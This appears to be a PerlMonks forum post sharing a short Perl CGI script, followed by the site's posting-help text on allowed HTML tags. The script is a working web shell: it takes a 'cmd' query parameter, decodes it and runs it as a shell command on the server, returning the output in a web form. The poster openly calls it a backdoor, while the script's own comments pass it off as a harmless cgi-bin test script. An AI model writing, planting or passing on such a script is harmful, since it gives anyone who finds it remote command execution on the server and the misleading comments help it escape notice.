One quick and dirty hack... This is a seriously hideous backdoor if you leave it on a public server. Remember you "command" start in the CGI directory. So you'll want to start with
"cd /someplace && somecommand"
of course, if you're web server is properly chroot'd, you can't do much with this.
#!/usr/bin/perl
# test.cgi
# A simple test script used to see if a a cgi-bin problem
# exists.
print "Content-type: text/html\n\n";
$cmd = $ENV{'QUERY_STRING'};
$cmd=~s/^cmd=//;
$cmd=~tr/+/ /;
$cmd=~s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
print <<EOF
<form action="/cgi-bin/command.cgi" method="get">
<input type="text" size="80" name="cmd" value="$cmd" />
</form>
EOF
;
print ('command: '.$cmd."<br />\n");
print("<pre>");
$fh = 'FOO';
if ( !open($fh, $cmd.'|') )
{
print 'error: '.$!."<br />\n";
exit(0);
}
while ( <$fh> )
{
print $_;
}
print("</pre>");
exit(0);
-
Are you posting in the right place? Check out Where do I post X? to know for sure.
-
Posts may use any of the Perl Monks Approved HTML tags. Currently these include the following:
<code> <a> <b> <big>
<blockquote> <br /> <dd>
<dl> <dt> <em> <font>
<h1> <h2> <h3> <h4>
<h5> <h6> <hr /> <i>
<li> <nbsp> <ol> <p>
<small> <strike> <strong>
<sub> <sup> <table>
<td> <th> <tr> <tt>
<u> <ul>
-
Snippets of code should be wrapped in
<code> tags not
<pre> tags. In fact, <pre>
tags should generally be avoided. If they must
be used, extreme care should be
taken to ensure that their contents do not
have long lines (<70 chars), in order to prevent
horizontal scrolling (and possible janitor
intervention).
-
Want more info? How to link
or How to display code and escape characters
are good places to start.
|